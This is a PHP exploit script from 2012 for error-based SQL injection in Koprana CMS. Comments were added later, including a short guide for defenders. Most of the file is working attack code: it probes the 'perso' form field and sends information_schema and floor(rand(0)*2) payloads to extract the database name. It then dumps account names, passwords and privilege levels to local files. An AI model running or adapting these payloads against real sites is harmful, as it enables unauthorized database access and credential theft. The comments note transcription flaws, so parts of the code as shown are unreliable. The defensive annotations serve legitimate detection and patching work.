Koprana CMS SQL Injection
Posted on 11 April 2012
<?php
// Koprana CMS error-based SQL injection exploit (The Crazy3D Team, April 2012).
//
// Reading guide for defenders: every request this script sends is a POST to
// {$path}index.php?pages=vip_ontrue whose "perso" form field carries the
// injected SQL (see PostIt() and the $inj_* strings below). The script decides
// the site is injectable purely from the literal "Erreur SQL" in the response,
// and extracts data by clipping a marked value ("~'" ... "'~1") that the
// database error echoes back into the page (see fetch_data()). Parameterising
// the query behind "perso" and not echoing SQL errors to the client closes
// both channels; a "perso" value containing information_schema /
// floor(rand(0)*2) / group by is the request-log signature to alert on.
//
// Original author notes (kept as written):
// NOTE : - If you are using BHR put this file in exploitswebapp folder
//        - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
 load exploits/webapp/omiworld_injection.php
 set HOST target
 set MODE (1 for admin accounts/2 for all accounts)
 set FILE (save format TXT/SQL)
 exploit

 !Koprana_Injection
 @ HOST = localhost = Target URL
 @ PORT = 80 = Target Port
 @ PATH = / = Web site path
 @ MODE = 1 = Injection mode
 @ FILE = sql = Save type
*/

// Warnings are silenced globally, so every failure below surfaces only as a die() message.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

/**
 * Open a plain TCP socket to $host:$port, send $packet verbatim and return the
 * entire response as one string. Dies when the socket cannot be opened.
 * No TLS and no HTTP parsing: callers receive headers and body together.
 */
function http_send($host,$port, $packet)
{
    if (!($sock = fsockopen($host, $port)))
        die(" [-] No response from {$host}:{$port} ");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

/**
 * Append one "account:pass:level" record to $file (opened in append mode).
 * $host is declared but never read.
 */
function write_txt($host, $file, $account, $pass, $level)
{
    $save_file = fopen("".$file."", "a+");
    fwrite($save_file, "$account:$pass:$level ");
    fclose($save_file);
}

/**
 * Append one INSERT statement for the record to $file. The three values are
 * interpolated without any escaping, and the table name is single-quoted.
 */
function write_sql($file, $account, $pass, $level)
{
    $save_file = fopen("".$file."", "a+");
    fwrite($save_file, "INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level') ");
    fclose($save_file);
}

/**
 * Append a per-host header to $file: an SQL comment when $file is
 * "accounts.sql", a banner line otherwise. Not called anywhere in this script.
 */
function write($host, $file)
{
    $save_file = fopen("".$file."", "a+");
    if($file == "accounts.sql")
        fwrite($save_file, "/* Accounts of $host */ ");
    else
        fwrite($save_file, "=========== Accounts of $host =========== ");
    fclose($save_file);
}

/**
 * Return the text between the first "~'" and the first "'~1" in $page, i.e.
 * the value the injected concat(0x7e,0x27,...,0x27,0x7e) wrapped. A false
 * return from strpos() is not checked, so when a marker is absent the offsets
 * are meaningless and the slice is junk or an empty string.
 */
function fetch_data($page)
{
    $debut = "~'";
    $debutTxt = strpos( $page, $debut ) + strlen( $debut );
    $fin = "'~1";
    $finTxt = strpos( $page, $fin );
    $data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt );
    return $data_fetch;
}

/**
 * Build a minimal HTTP/1.0 POST to {$path}index.php?pages=vip_ontrue with
 * $payload as the form body and return the raw response from http_send().
 * The header strings end in a single space where CRLF terminators appear to
 * have been lost in transcription (only one literal line break survives,
 * after Content-Length); as pasted, the request is one header line plus body.
 */
function PostIt($host,$port,$path,$payload)
{
    $packet = "POST {$path}index.php?pages=vip_ontrue HTTP/1.0 ";
    $packet .= "Host: {$host} ";
    $packet .= "Content-Type: application/x-www-form-urlencoded ";
    $packet .= "Content-Length: ".strlen($payload)." 
";
    $packet .= "Connection: keep-alive {$payload}";
    return http_send($host,$port, $packet);
}

// Banner. The trailing spaces appear to stand where line breaks were in the original.
print " +-----------------------[ The Crazy3D Team ]--------------------------+";
print " | Koprana CMS SQL Injection Exploit |";
print " | by The UnKn0wN |";
print " | Greets to : The Crazy3D's members and all Algerian h4x0rs |";
print " +---------------------------------------------------------------------+";
print " | www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print " +---------------------------------------------------------------------+ ";

// Five positional arguments are read below ($argv[1]..$argv[5]), but the guard
// passes as soon as $argc reaches 5 (script name plus four arguments); in that
// case $argv[5] is unset and, with notices suppressed, $file becomes "accounts.sql".
if ($argc < 5)
{
    print " Usage......: php $argv[0] <host> <port> <path> <mode> <save> ";
    print " Example....: php $argv[0] localhost 80 / 1 txt ";
    print " Example....: php $argv[0] localhost 80 /site/ 3 sql ";
    die();
}

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];
$file = $argv[5];
// Anything other than "txt" selects the SQL output file.
if($file == "txt")
    $file = "accounts.txt";
else
    $file = "accounts.sql";

// Step 1: vulnerability probe. The bare boolean tail works only because the
// CMS echoes its SQL error ("Erreur SQL") into the page; the test is error
// disclosure, not a true/false oracle.
$inj_test = "or '1'='1";
// Step 2: read the current database name. The count(*)/floor(rand(0)*2)/group by
// construction is intended to provoke a MySQL error that quotes the grouped
// value, wrapped in ~'...'~ so fetch_data() can clip it out of the HTML.
$inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_test."";
// PostIt() is called here as postit(); PHP function names are case-insensitive.
if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload))))
    die ("[-] CMS not vulnerable ");
else
    print ("[+] CMS can be exploited! ");
$payload = "send=Envoyer&perso=test".$inj_db."";
$db = fetch_data(PostIt($host,$port,$path,$payload));
// empty() also treats the string "0" as missing.
if(empty($db))
    die("[-] Can't find the database! ");
print "[+] Database: ".$db." 
";

// $mode is the raw argv string; switch compares loosely, so "1" matches case 1.
// Only modes 1 and 2 are handled; any other value (the usage text shows "3")
// matches no case and the script ends after printing the database name.
switch ($mode)
{
    case 1:
        // Admin accounts only: rows with level>0. First request counts them.
        $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
        $payload = "send=Envoyer&perso=test".$inj_count_accounts."";
        $num = fetch_data(PostIt($host,$port,$path,$payload));
        print "[+] Admin accounts: ".$num." ";
        // One request per row (LIMIT $i,1); $num is the string clipped by fetch_data().
        for($i=0; $i<$num; $i++)
        {
            $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
            $payload = "send=Envoyer&perso=test".$inj_accounts."";
            $data = fetch_data(PostIt($host,$port,$path,$payload));
            // Fields were joined with 0x2f ("/") but are split on "/", "." or "-".
            list($account, $pass, $level) = split('[/.-]', $data);
            print "Account: {$account} Pass: {$pass} Level: {$level} ";
            // Harvested rows are written to disk as-is (write_txt() declares $host first; it is called with four arguments).
            if($file == "accounts.txt")
                write_txt($file, $account, $pass, $level);
            else
                write_sql($file, $account, $pass, $level);
        }
        break;
    case 2:
        // All accounts: the same two queries without the level>0 filter.
        $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
        $payload = "send=Envoyer&perso=test".$inj_count_accounts."";
        $num = fetch_data(PostIt($host,$port,$path,$payload));
        print "[+] Accounts: ".$num." 
";
        for($i=0; $i<$num; $i++)
        {
            $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
            $payload = "send=Envoyer&perso=test".$inj_accounts."";
            $data = fetch_data(PostIt($host,$port,$path,$payload));
            // Same "/"-joined tuple, same over-broad split as in case 1.
            list($account, $pass, $level) = split('[/.-]', $data);
            print "Account: {$account} Pass: {$pass} Level: {$level} ";
            if($file == "accounts.txt")
                write_txt($file, $account, $pass, $level);
            else
                write_sql($file, $account, $pass, $level);
        }
        break;
}
